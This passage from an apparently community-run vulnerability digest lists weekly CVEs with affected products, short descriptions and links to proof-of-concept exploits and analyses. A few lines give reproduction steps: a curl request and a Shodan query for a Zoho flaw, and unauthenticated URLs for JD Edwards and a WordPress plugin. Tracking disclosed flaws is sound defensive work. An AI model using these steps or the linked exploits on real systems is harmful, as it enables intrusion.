CVE-2018-2628\n - Cisco Webex Meetings App (affected version <=42.7) Character Interface Manipulation Vulnerability. \n - Google Chromium Insufficient Data Validation Vulnerability CVE-2022-3075\n - Android OS Privilege Escalation Vulnerability CVE-2011-1823\n - [Ubuntu Security Patched.](https://ubuntu.com/security/notices) \n - Ubuntu 20.04 LTS : Linux kernel (Azure CVM) vulnerabilities.\n - Ubuntu 16.04 ESM & Ubuntu 14.04 ESM : Dnsmasq vulnerability, LibTIFF vulnerabilities, Linux kernel (HWE) vulnerabilities, linux-oracle - Linux kernel for Oracle Cloud systems.\n - D-Link DIR-816L RCE Vulnerability CVE-2022-28958\n - D-Link DIR-820L RCE Vulnerability CVE-2022-26258\n - D-Link Multiple Routers OS Command Injection Vulnerability CVE-2018-6530\n - D-Link DIR-300 Router Cleartext Storage of a Password Vulnerability CVE-2011-4723\n - NETGEAR Multiple Devices Exposure of Sensitive Information Vulnerability CVE-2017-5521\n---\n \n - [CVE-2022-34169 Analysis](https://noahblog-360-cn.translate.goog/xalan-j-integer-truncation-reproduce-cve-2022-34169/?_x_tr_sch=http&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp) & construction of [full exploit](https://gist-github-com.translate.goog/thanatoskira/07dd6124f7d8197b48bc9e2ce900937f?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp)\n \n - Target: **Apache Xalan-J - A Java version implementation of an XSLT processor.**\n \n - Discription/Issue : In short a vulnerability in Xalan-J, an Apache project used by multiple SAML implementations, could allow arbitrary code execution and Felix Wilhelm(Security Researcher at Project Zero- Google) said that Xalan-J is vulnerable to an XSLT(a markup language that can transform XML documents into other formats, such as HTML.) Integer Truncation issue when processing malicious XSLT stylesheets.\n\n - [CVE-2022-31474 Wordpress](https://www.wordfence.com/blog/2022/09/psa-nearly-5-million-attacks-blocked-targeting-0-day-in-backupbuddy-plugin/)\n \n - Target: **WordPress plugin - BackupBuddy**\n - Affected Version : 8.5.8.0 and 8.7.4.1.\n - Fully Patched Version: 8.7.5\n \n - Discription/Issue : WordPress websites running BackupBuddy plugin with 140,000 active installations, is meant to help WordPress site administrators easily manage their backup operations. The plugin allows users to store the backups to various online and local destinations is vulnerability and CVE assigned to this vulnerability is CVE-2022-31474 with a CVSS score of 7.5, the exploited vulnerability exists because of an insecure method of downloading the backups for local storing, which enables unauthenticated attackers to download sensitive files from vulnerable sites.\n\n -[](https://github.com/emirpolatt/CVE-2022-31188)\n\n ---\n ### EXPLOIT : \n - [Mobile Mouse 3.6.0.4 Remote Code Execution](https://github.com/blue0x1/mobilemouse/blob/main/mobilemouse.py) \n - Exploit Author: Chokri Hammedi\n - Vendor Homepage: https://mobilemouse.com/\n - Software Link: https://www.mobilemouse.com/downloads/setup.exe\n - Version: 3.6.0.4\n - Tested on: Windows 10 Enterprise LTSC Build 17763\n - Discription: Mobile Mouse 3.6.0.4 could allow a remote attacker to execute arbitrary code on the system, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \n\n
\n---\n
\n \n \nCVE's that matter [#Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 30th August - 07th September 2022 \n\n CVE POC exploit : CVE-2022-1388, CVE-2022-32250 and CVE-2022-2639.\n \n CVE Analysis : CVE-2022-30592, CVE-2021-38297, CVE-2022-31814, CVE-2022-21371, CVE-2022-24637, CVE-2022-33174, CVE-2022-1802, \n CVE-2022-23779, CVE-2022-24637, CVE-2022-35406 and Week#35 of Advisory Week Newsletter.\n \n \n\n\n - [CVE-2022-30592](https://github.com/efchatz/HTTP3-attacks)\n \n - Target: **QUIC-enabled servers (IIS, NGINX, LiteSpeed, Cloudflare, H2O, and Caddy)**\n - Discription/Issue : HTTP3-attacks : The current repository serves the purpose of sharing the scripts we used for educational usage. These attacks were a part of our study, and were tested against 6 different QUIC-enabled servers that were configured to communicate with HTTP/3. The http-stream script is the exploit of the CVE-2022-30592 issue that affected lsquic library. This script can also be exploited against Litespeed server.\n \n - [CVE-2021-38297 Analysis](https://jfrog.com/blog/cve-2021-38297-analysis-of-a-go-web-assembly-vulnerability/)\n \n - Target: **Golang (“Go”) programming language**\n - Patched : fixed versions (1.16.9, 1.17.2 or later).\n - Discription/Issue : @jfrog has elaborate the prerequisites for exploiting the Go vulnerability, which allows an attacker to override an entire Wasm (WebAssembly) module with its own malicious code and achieve WebAssembly code execution, and explore mitigation strategies for developers.\n \n- [CVE-2022-23779](https://github.com/Vulnmachines/Zoho_CVE-2022-23779)\n \n - Product: **ZOHO**\n - Discription/Issue : Zoho Internal Hostname Disclosure Vulnerability\n \n Step 1: curl -ILk https://IP:port/themes\n Step 2: Read the HTTP redirect response and anaylze the Location HTTP response header.\n BONUS #Shodan : title:\"ManageEngine Desktop Central 10\"\n\n- [CVE-2022-2639 PoC](https://drive.google.com/drive/folders/1f5YzKy_NChwlbYqHp-7Ih3RTSTBq9Ns6?usp=sharing)\n \n - Target: **Linux kernel openvswitch local privilege escalation.**\n - Tested on : 5.13, 5.4, 4.18.\n - Discription/Issue : Using pipe-primitive to exploit CVE-2022-2639, so no kaslr leak nor smap smep ktpi bypass is needed.\n\n- [CVE-2022-31814 Analysis](https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/)\n \n - Target/Product: **pfBlockerNG plugin**\n - Affected Version : <= 2.1.4_26\n - Discription/Issue : IHTeam undertook an independent security assessment of pfsense’s pfBlockerNG plugin version 2.1.4_26 and identified Unauthenticated Remote Command Execution as root (CVE-2022-31814).\n \n \n - [CVE-2022-21371](https://github.com/Vulnmachines/Oracle-WebLogic-CVE-2022-21371)\n \n - Target/Product: **Oracle Fusion Middleware's Oracle WebLogic Server product **\n - Affected Version : 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0\n - Discription/Issue : The Oracle Fusion Middleware's Oracle WebLogic Server product (Web Container component) is vulnerable to local file inclusion. An easily exploited vulnerability could allow an unauthenticated attacker with HTTP network access to compromise Oracle WebLogic Server. A successful attack on this vulnerability, provide hackers complete access to Oracle WebLogic Server's whole data store or unrestricted access to sensitive data.\n\n - [CVE-2022-1388_PoC](https://github.com/alt3kx/CVE-2022-1388_PoC)\n \n - Target: **F5 BIG-IP RCE exploitation**\n - Affected Version : On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication.\n - Discription/Issue : F5 BIG-IP RCE exploitation (CVE-2022-1388)\n\n - [CVE-2022-33174](https://github.com/Henry4E36/CVE-2022-33174)\n \n - Target/Product: **[Powertek PDUs](https://www.powertekpdus.com/)**\n - Affected Version : Powertek PDU 3.30.30\n - Discription/Issue : Powertek PDUs are high quality custom rack power distribution units from Powertek Corporation. There is a security vulnerability in Powertek PDU versions prior to 3.30.30. The vulnerability stems from the fact that the power distribution unit allows remote authorization to be bypassed in the web interface. The vulnerability can be exploited by an attacker to obtain the username and password in clear text.\n \n - [CVE-2022-24637](https://github.com/JacobEbben/CVE-2022-24637)\n \n - Target/Product : **Open Web Analytics (OWA)**\n - Affected Version : <1.7.4.\n - Discription/Issue : Exploit for the Unauthenticated RCE in Open Web Analytics (OWA) <1.7.4. This work is based on https://devel0pment.de/?p=2494.\n\n\n - [CVE-2022-1802 + CVE-2022-1529 + CVE-2022-2200](https://github.com/mistymntncop/CVE-2022-1802)\n \n - Tested: **Firefox 100.0.1**\n - Discription/Issue : Firefox 100.0.1 RCE Object prototype, they could set undesired attributes on a JavaScript object, leading to privileged code execution.\n\n - [CVE-2022-35406 Writeups](https://medium.com/@mr.vrushabh/discovery-of-cve-2022-35406-303f4bca2742)\n - Discription/Issue : @mr.vrushabh found the CVE-2022-35406 on PortSwigger Web Security. This was a bug in Repeater/Intruder whereby a meta redirect would be followed when a user clicked the follow redirection button regardless of the content type or content disposition headers used on the target web site. This could disclose the referrer header. It was considered a low severity issue because the attack scenario involved multiple unlikely steps that involved user interaction. \n\n - In week 35 of Advisory Week Newsletter. You'll be seeing update on [Security Fixed on Apple, Microsoft, Github, Red Hat, Ubuntu, Mozilla and Nation Cyber Awareness System](https://advisoryweek.com/) \n\n
\n---\n
\n \n\nCVE's that matter [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 23rd - 30th August 2022\n\n \n CVE POC exploit : CVE-2022-32250, CVE-2022-37042, CVE-2022-38766, CVE-2022-23779, CVE-2022-32250-Linux-Kernel-LPE, \n CVE-2022-22715 , CVE-2022-37153, CVE-2022-2884, CVE-2022-2586 and CVE-2022-LPE-UAF.\n \n CVE Analysis : CVE-2022-20233, Multiple CVE in TENDA, CVE-2022-24787, CVE-2022-33318, CVE-2022-2884, CVE-2022-26377, \n CVE-2020-2733 and CVE-2022-30129. \n\n \n \n - [CVE-2022-32250 Exploit](https://github.com/theori-io/CVE-2022-32250-exploit)\n - Target: **Linux-Kernel**\n - Affected Version: Linux, before commit 520778042ccca019f3ffa136dd0ca565c486cedd (26 May, 2022) & Ubuntu <= 22.04 before security patch.\n \n - Discription :CVE-2022-32250 allows a local user to escalate privileges to root because an incorrect NFT_STATEFUL_EXPR check leads to a use-after-free(UAF). \n\n- [N-day exploit for CVE-2022-2586 - Analysis](https://www.openwall.com/lists/oss-security/2022/08/29/5)\n - Target/Product: **Linux Kernel nft_boject UAF**\n - Affected Version : 3.16-rc1\n \n - Discription : The vulnerability is a Use-After-Free (UAF) in nf_tables, that makes it possible to escalate privileges from any user to root, and it is present since kernel version v3.16-rc1. To exploit this bug we need to enter a new network namespace to obtain `CAP_NET_ADMIN` (i.e: unprivileged user namespaces must be enabled, which is the case on most Linux distributions nowadays).\n\n - [CVE-2022-22715 POC](https://github.com/k0keoyo/my_vulnerabilities/tree/master/CVE-2022-22715)\n - Target: **Window OS**\n - Discription : In February 2022, Microsoft patched the vulnerability k0keoyo used in TianfuCup 2021 for escaping Adobe Reader sandbox, assigned CVE-2022-22715. The vulnerability existed in Named Pipe File System nearly 10 years since the AppContainer was born. We called it \"Windows Dirty Pipe\".\n - Root Cause : The vulnerability existed in Named Pipe File System Driver - npfs.sys, and the issue function is npfs!NpTranslateContainerLocalAlias. When we invoking NtCreateFile with a named pipe path, it will hit the IRP_MJ_CREATE major function of npfs, it called NpFsdCreate.\n\n - [CVE-2022-20233 Analysis](https://blog.quarkslab.com/attacking-titan-m-with-only-one-byte.html)\n - Product: **Titan M - A security chip introduced by Google in their Pixel smartphones, starting from the Pixel 3.**\n - Patched : Pixel Security update of June 2022.\n \n - Discription/Issue : On 2022-08-11, Google awared Quarkslab's engineers Damiano Melotti and Maxime Rossi $75,000, and Damiano Melotti and Maxime Rossi Bellom presented their Titan M vulnerability research project at the Black Hat USA 2022 Briefings in Las Vegas. You can also Check out this week Tools section find vulnerability on Titan M.\n\n - [Multiple CVE in TENDA](https://github.com/Darry-lang1/vuln/tree/main/Tenda/AC1206/4)]\n - Product: **Tenda AC1206 Router**\n - Affected Version : V15.03.06.23\n \n - Discription/Issue : Recenty, Multiple CVE has been assigned for Tenda AC1206. CVE that you must checkout CVE-2022-37798, CVE-2022-37799, CVE-2022-37800, CVE-2022-37801, CVE-2022-37802, CVE-2022-37803, CVE-2022-37804, CVE-2022-37805, CVE-2022-37806 & CVE-2022-37807.\n\n - [CVE-2022-24787 Report analysis](https://securitylab.github.com/advisories/GHSL-2022-001_Orckestra_C1_CMS/)\n - Target/Product: **Orckestra C1 CMS - Content Management System that scales out in the cloud.**\n - Version: v6.11\n \n - Discription : @JarLob (Jaroslav Lobacevski) reported an issue highlighting \"Deserialization of untrusted data(GHSL-2022-001) allows for Server Side Request Forgery (SSRF) or arbitrary file truncation.\"\n \n - [CVE-2022-38766 POC]\n - Target/Product: **Renault 2021 ZOE Electronic car**\n \n - Discription/Issue : This vulnerability raised the question of whether ZOE electric vehicles are safe form RF hacking. For this reason, the actual ZOE vehicle released this year was targeted and attacked. A study was also conducted on how this attack bypass the rolling codes, a defense technique of RF hacking, and a lot of thought was needed about the handling method in case the car breaks down.\n \n - [CVE-2022-37042 POC Exploit](https://github.com/aels/CVE-2022-37042)\n - Target: **Zimbra**\n - Discription : Zimbra CVE-2022-37042 Nuclei weaponized template shell path: /public/formatter.jsp\n \n - [CVE-2022-23779 Proof-of-Concept Exploit](https://github.com/Vulnmachines/Zoho_CVE-2022-23779)\n - Target: **ZOHO**\n - Discription : Internal Hostname Disclosure Vulnerability\n\n - [CVE-2022-33318 - Remote Code Execution in ICONICS Genesis64](https://github.com/0vercl0k/paracosme)\n - Target: **Genesis64 suite**\n - Version: 10.97.1\n \n - Discription : Paracosme (Remote Code Execution in ICONICS Genesis64 exploit) was demonstrated during the Pwn2Own 2022 Miami contest that took place at the S4x22 Conference. Paracosme exploits a use-after-free issue found in the GenBroker64 process to achieve remote code execution on a Windows 21H2 x64 system.At a high level, the GenBroker64 process listens on the TCP port 38080 and is able to deserialize various packets after a handshake has been done with a client. The isue I found is in the code that handles reading a VARIANT from the network socket. Basically a variant is a type and a value. The function seems well-written at first sight, and takes efforts to only unpacks certain types. \n \n\n - [CVE-2022-2884](https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/)\n - Target: **GitLab**\n - Version: 15.3.1, 15.2.3, 15.1.5\n \n - Discription : There is a critical vulnerability with the identifier CVE-2022-2884 and a score of 9.9 in versions 11.3.4 to 15.1.4 and between 15.2 and 15.2.3, as well as 15.3 community and enterprise versions, which allows the hacker to execute code remotely. provides This vulnerability occurs in GitHub import.\n\n\n - [CVE - 2022-LPE-UAF](https://github.com/greek0x0/2022-LPE-UAF )\n - Target: **Linux kernel**\n \n - Discription : Security researchers discovered 3 vulnerabilities in the Linux kernel that could allow a local attacker to elevate privileges and potentially execute malicious code. [Paper on Dirtycred by Zhenpeng](https://zplin.me/papers/DirtyCred-Zhenpeng.pdf)\n\n\n - [CVE-2022-26377 Analysis](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/)\n - Target: **Apache HTTPd**\n - Title : apache-httpd-ajp-request-smuggling :\n \n - Discription : This article introduces a new attack method and idea for AJP, which can be used in applications such as Apache HTTPd proxy_ajpThe attack surface of the reverse proxy for Tomcat AJP, the product self-developed AJP reverse proxy, and the horizontal expansion to FastCGI and other protocols can also be attempted (of course, no other protocols have been dug). \n\n - [CVE-2020-2733 Analysis](https://redrays.io/cve-2020-2733-jd-edwards/)\n - Product: ** Oracle JD Edwards EnterpriseOne Tools**\n - Affected Version : < 9.2\n \n - Discription/Issue : The vulnerability was discovered in the Oracle JD Edwards Management portal. To reproduce the vulnerability, you need to open (without authentication) the following [URL](http://JDEdwards:8999/manage/fileDownloader?sec=1) When you open the URL, you can see pseudo-random text in the page. ACHCJKGJHCJKBLLALOLOJFCABEFHOALDDAOFNGGANPDB. After analyzing the JD Edwards jar files, Researcher discovered that this pseudo-random data is – THE ENCRYPTED ADMIN PASSWORD!\n\n - [CVE-2022-30129 - Analysis](https://blog.sonarsource.com/securing-developer-tools-argument-injection-in-vscode/)\n - Target/Product: **Microsoft - Virtual Studio Code**\n - Affected Version : 1.67.1\n \n - Discription/Issue : Argument Injection in Visual Studio Code : The vulnerability can be used to target developers that have the Visual Studio Code IDE installed. Upon clicking on a malicious link crafted by an attacker, victims are prompted to clone a Git repository in Visual Studio Code. \n\n
\n--- \n
\n \nCVE's that matter Week 03-> 16th - 22nd Aug 2022** \n\n\n- [CVE-2022-1802 POC Exploit](https://github.com/mistymntncop/CVE-2022-1802)\n - Target: **Amazon-Linux 2 : thunderbird Package**\n - Version Affected: <0:91.9.1-1.amzn2.0.1 \n - Discription : The Mozilla Foundation Security Advisory describes this flaw as:\n An attacker could have sent a message to the parent process where the contents were used to double-index into a JavaScript object, leading to prototype pollution and ultimately attacker-controlled JavaScript executing in the privileged parent process. (CVE-2022-1529).\n\n- [CVE-2022-35742](https://blog.78researchlab.com/b9c80d00-d935-43b1-8805-969000df301d)\n - Target: **Window Outlook**\n - Patched on August 2022\n - Discription : Denial of serice at Outlook where attacker can triger a vulnerability by sending crafteted email and vulnerability occurs during MIME property parsing.\n\n - [CVE-2021-43811 POC](https://github.com/s-index/CVE-2021-43811)\n - Target: **awslabs/sockeye**\n - Version: < 2.3.24 \n - Discription :Sockeye is an open-source sequence-to-sequence framework for Neural Machine Translation built on PyTorch. Sockeye uses YAML to store model and data configurations on disk. Versions below 2.3.24 use unsafe YAML loading, which can be made to execute arbitrary code embedded in config files. An attacker can add malicious code to the config file of a trained model and attempt to convince users to download and run it. If users run the model, the embedded code will run locally. The issue is fixed in version 2.3.24.\n\n- [CVE-2020-6369 Patch bypass](https://redrays.io/cve-2020-6369-patch-bypass/)\n - Target: **CA Introscope Enterprise Manager’s**\n - Version Affected :\n WILY_INTRO_ENTERPRISE 9.7\n WILY_INTRO_ENTERPRISE 10.1\n WILY_INTRO_ENTERPRISE 10.5\n WILY_INTRO_ENTERPRISE 10.7\n - Discription : CA Introscope Enterprise Manager’s releases 10.7.0.306 or lower, allow unauthenticated attackers to bypass the authentication if the administrator has not changed the default passwords for Admin and Guest. This may impact the confidentiality of the service.\n\n - [CVE-2022-36966]\n - Target: **Orion platform**\n - Discription : CVE-2022-36966 has been assigned as the Zero-Day for the escalation of privilege in Orion platform.The exploit requires internal + initial access. Details will be shared as SolarWinds provides official feedback. The vulnerability was identified by researcher 'Asim Khan'\n\n\n - [1day to 0day(CVE-2022-30024) on TP-Link TL-WR841N](https://blog.viettelcybersecurity.com/1day-to-0day-on-tl-link-tl-wr841n/)\n - Target: **TP-Link TL-WR841N devices**\n - Discription : Vulnerabilities on TP-Link TL-WR841N devices CVE-2020-8423 \tData parsing,CVE-2022-24355 \tFile extensions handling & CVE-2022-30024 \tAssignment data\n\n\n - [CVE-2022-27255 POC](https://github.com/infobyte/cve-2022-27255/tree/main/exploits_nexxt)\n - Target: **Realtek eCos SDK SIP ALG buffer overflow**\n - Vulnarable Device : \n \n Nexxt Nebula 300 Plus\n Tenda F6 V5.0\n Tenda F3 V3\n Tenda F9 V2.0\n Tenda AC5 V3.0\n Tenda AC6 V5.0\n Tenda AC7 V4.0\n Tenda A9 V3\n Tenda AC8 V2.0\n Tenda AC10 V3\n Tenda AC11 V2.0\n Tenda FH456 V2.0\n Zyxel NBG6615 V1.00\n Intelbras RF 301K V1.1.15\n Multilaser AC1200 RE018\n iBall 300M-MIMO (iB-WRB303N)\n Brostrend AC1200 extender\n MT-Link MT-WR850N\n MT-Link MT-WR950N\n Everest EWR-301\n D-Link DIR-822 h/w version B\n Speedefy K4\n Ultra-Link Wireless N300 Universal Range Extender\n Keo KLR 301\n QPCOM QP-WR347N\n NEXT 504N\n Nisuta NS-WIR303N (probably V2)\n Rockspace AC2100 Dual Band Wi-Fi Range Extender\n KNUP KP-R04\n Hikvision DS-3WR12-E\n\n - Discription : PoC and exploit code. The PoC should work on every affected router, however the exploit code is specific for the Nexxt Nebula 300 Plus router. For More - https://github.com/infobyte/cve-2022-27255\n\n\n - [CVE-2022-37393 Technical Analysis](https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393/rapid7-analysis)\n - Target: ** Zimbra Collaboration Suite**\n - Discription : We are not aware of active exploitation of CVE-2022-37393 at this time, but it could be very difficult to detect successful exploitation because it grants root access.\n\n\n - [CVE-2022-21881 POC](https://github.com/theabysslabs/CVE-2022-21881)\n - Target: **TianfuCup 2021**\n - Discription : POC of CVE-2022-21881 exploited at TianfuCup 2021 to escape Chrome Sandbox \n\n - [CVE-2022-29805 Analysis](https://www.whiteoaksecurity.com/blog/fishbowl-disclosure-cve-2022-29805/)\n - Target: **Fishbowl**\n - Version: <2022.4.1.\n - Discription : White Oak Security discovered an instance of Fishbowl Inventory that was vulnerable to a Java deserialization vulnerability, resulting in unauthenticated remote code execution. \n \n - [CVE-2022-37042 Zimbra Authentication Bypass](https://github.com/projectdiscovery/nuclei-templates/pull/5134/files)\n - Target: **Zimbra**\n - Discription : Nuclei Zimbra: Release of CVE-2022-37042 Zimbra Authentication Bypass Causing RCE Non-Destructive Vulnerability Detection Template.\n \n
\n---\n
\n \nCVE's that matter Week 02-> 9 - 16 Aug 2022\n\n\n - [CVE-2022-27255](https://github.com/infobyte/cve-2022-27255)\n - Target: **Realtek eCos SDK SIP ALG buffer overflow.**\n - Discription : This repository contains de materials for the talk \"Exploring the hidden attack surface of OEM IoT devices: pwning thousands of routers with a vulnerability in Realtek’s SDK for eCos OS.\", which was presented at DEFCON30.\n\n - [CVE-2022-30216]()\n - Target: **Windows Server service**\n - Version: Windows 11/Server 2022 machine.\n - Discription : PoC of the srvsvc auth coerce vulnerability [(CVE-2022-30216) : Authentication coercion of the Windows “Server” service.](https://www.akamai.com/blog/security/authentication-coercion-windows-server-service)\n\n\n - [CVE-2022-36446 POC](https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE)\n - Target: **Webmin**\n - Version: < 1.997. \n - Discription : A Python script to exploit CVE-2022-36446 Software Package Updates RCE (Authenticated) on Webmin.\n\n - [DashOverright POC]()\n - Target: **VMware vRealize Operations Manager**\n - Version : <= 8.6.3.19682901. \n - Discription : This is a pre-authenticated RCE exploit for VMware vRealize Operations Manager (vROPS) that impacts versions <= 8.6.3.19682901. \n This exploit chains three vulnerabilities that have been patched.\n CVE-2022-31675 - MainPortalFilter ui Authentication Bypass\n CVE-2022-31674 - SupportLogAction Information Disclosure\n CVE-2022-31672 - generateSupportBundle VCOPS_BASE Privilege Escalation\n\n - [CVE-2021-43908 Analysis](https://blog.electrovolt.io/posts/vscode-rce/)\n - Target: **Virtual Studio Code**\n - Discription: Visual Studio Code - Remote Code Execution in Restricted Mode (CVE-2021-43908)\n \n - [CVE-2022-31101 POC](https://github.com/karthikuj/CVE-2022-31101)\n - Target: **PrestaShop** is the universal open-source software platform to build your e-commerce solution. \n - Discription: Exploit for PrestaShop bockwishlist module 2.1.0 SQLi \n\n - [CVE-2022-33980](https://github.com/HKirito/CVE-2022-33980)\n - Target: **apache**\n - Version: \t2.2.4 to 2.7-2\n - Discription: Apache Commons RCE can use url,dns,script key-words to connect any server.\n\n - Micosoft security update that matter : \n - [CVE-2022-34715 POC](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34715) - Discription: Windows Network File System Remote Code Execution Vulnerability.\n - [CVE-2022-30133](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30133) - Discription: Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (Disable port 1723)\n - [CVE-2022-34713](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34713) - Discription: 0-days DogWalk- Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability\n\n - [CVE-2020-0796](https://github.com/msuiche/smbaloo)\n - Target: **Windows ARM64**\n - Discription: A CVE-2020-0796 (aka \"SMBGhost\") exploit for Windows 10 18362 ARM 64-bit (AArch64)\n \n- [Vulnerabilities in Cisco Small Business products](https://pastebin.com/8w2VVXn2)\n - CVE-2022-20842 \n - CVE-2022-20827 \n - CVE-2022-20841\n\n- [Multiple Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software has not been FIXED](https://www.rapid7.com/blog/post/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/)\n - Cisco ASDM binary packages \t\n - CVE-2022-20829 \tNot fixed** \n - None(CVE not Assigned Yet) \tNot fixed\n - Cisco ASDM (7.17.1.155). \t\n - CVE-2022-20651 \tFixed\n - Cisco ASDM client (fixed in ASDM 7.18.1.150, but Rapid7 has informed Cisco that the issue was in fact not addressed and remains unfixed. \n - CVE-2021-1585 CSCvw79912 \tNot fixed**\n - Cisco ASDM binary package code execution mechanism to be used with CVE-2022-20829 or CVE-2021-1585. \t \n - CSCwc21296 \tFixed\n - Cisco ASA-X with FirePOWER Services \n - CVE-2022-20828 \tFixed in most maintained versions\n - Cisco FirePOWER module before 6.6.0 \t\n - CSCvo79327 \tFixed in most maintained versions\n - >= 7.0. Not fixed on ASA.\n - Cisco ASA with FirePOWER Services \n - None \tNot fixed\n - Some Cisco FirePOWER module\n - None \tNot fixed\n\n
\n---\n
\n \nCVE's that matter Week 01 -> 2 - 9 Aug 2022\n\n\n - [CVE-2022-36446 Exploit](https://www.exploit-db.com/exploits/50998)\n - Target: **Webmin**\n - Version: 1.996\n - Discription: [Remote Code Execution (RCE) Authenticated During Install New Packages.](https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165)\n \n - [CVE-2022-2552 Exploit](https://github.com/SecuriTrust/CVEsLab/tree/main/CVE-2022-2552)\n - Target: **WordPress Plugin Duplicator**\n - Version: <=1.4.7\n - Discription : Unauthenticated System Information Disclosure \n - #Proof-Of-Concept: 1-System information.\n Some system information is obtained using the \"view\" parameter.\n http://[PATH]/backups-dup-lite/dup-installer/main.installer.php\n \n - [An **CVE-2022-29582-io-uring** subsystem of the Linux kernel vulnerability](https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/)\n \n - [**CVE-2022-35405 Zoho** Password Manager Pro XML-RPC RCE](https://xz-aliyun-com.translate.goog/t/11578?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-GB)\n\n - [**CVE-2022-1215 - Analysis**](https://blog.coffinsec.com/nday/2022/08/04/CVE-2022-1215-libinput-fmt-canary-leak.html)\n - Target: **libinput library**\n - Version: < 1.20.0\n - Discription:nday exploit - A format string vulnerability exists in the libinput library, \n allowing a local attacker to achieve arbitrary code execution in the context of libinput.\n\n- [CVE-2022-34918 LPE POC](https://github.com/veritas501/CVE-2022-34918)\n - Target: *Linux Kernal module*(4 Aug 2022) \n - Version span: v5.8 ~ v5.19 \n - Discription: netfilter nf_tables local privilege escalation analysis \n \n - [Multiple CVE's on VMWARE miltiple products and a critical(9.8) CVE-2022-31656](https://www.vmware.com/security/advisories/VMSA-2022-0021.html)\n - Target: **VMWARE**\n - Version: 21.08.0.1, 21.08.0.0\n - Discription: VMware Workspace ONE Access, Access Connector, Identity Manager, Identity Manager Connector and vRealize Automation updates address multiple vulnerabilities.\n \n- [nex-forms-exploit](https://github.com/ehtec/nex-forms-exploit)\n - Target: *Wordpress plugin*(2nd August 2022)\n - Versions: <= 7.9.6)\n - Discription: Authenticatd SQL injection vulnerability in the \"NEX Forms\" Wordpress plugin .\n \n- [CVE-2022-2185](https://github.com/star-sg/CVE/tree/master/CVE-2022-2185)\n - Target: **GitLab**\n - Version: GitLab affecting all versions starting from 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1\n - Exploit Written By: [Nguy?n Ti?n Giang](https://github.com/testanull)\n\n
\n" }, { "path": "ResetCybersecuirty/CVE's/CVE_Assests/Readme.md", "content": "# Security Patched, CVE : poc, analysis and Exploit.\n\n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)

\"/Pentesting-Bugbounty//ResetCybersecuirty/CVE's/Readme.md\"

\n
\n \nA collection on latest proof-of-concept exploit scripts and analysis of latest patched CVE. \n \n > Why you ask becuase There are tens of thousands of vulnerabilities disclosed each year. Only a handful of them will ever be exploited and this will makes you and your organization vulnerable with latest vulnerabilities. \n \n \n - Every Week our team filter out latest IT security CVEs POC, update on patchted security, writeups & analysis of cve that has been discovered, written or found by community members. Format we follow : \n \n\n\n \n # Security Patched within a Week: Latest IT security vulnerability patched within this week on selected company such as Apple, Google, :\n # CVE Analysis: CVE analysis and poc for analysis.\n # Poc Exploit : Tracking the recetly discovered PoC of old & new CVE. \n \n - [CVE]\n - Target/Product: ** **\n - Affected Version/ Patched :\n - Discription/Issue/Flaw :\n \n
\n\n\n---\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 12th October-18th October 2022\n\n\n \n Security Patched within a Week: Latest vulnerability that has been patched within last two week (12th Oct - 18th October 2022). \n featuring releases from Apple, Microsoft, Adove, Github, goole, Linux(Ubuntu, kali etc), etc.\n \n CVE:ANALYSIS & POC: Poc for CVE-2022-40684 & Nuclei template, CVE-2022-41033, CVE-2022-36067, CVE-2021-45067, CVE-2022-42889/ Text4Shell \n and Detailed Report of Top cves most used by Chinese state-sponsored cyber actors since 2020 \n\n \n CVE POC (0-Day): CVE-2021-46422(google crome), CVE-2022-41852, CVE-2021-45067, Poc for CVE-2022-40684 & Nuclei template, \n CVE-2022-41033, Zeroday Microsoft Exchange Server checker (Virtual Patching checker), DropBox-XPC-Exploit, \n \n
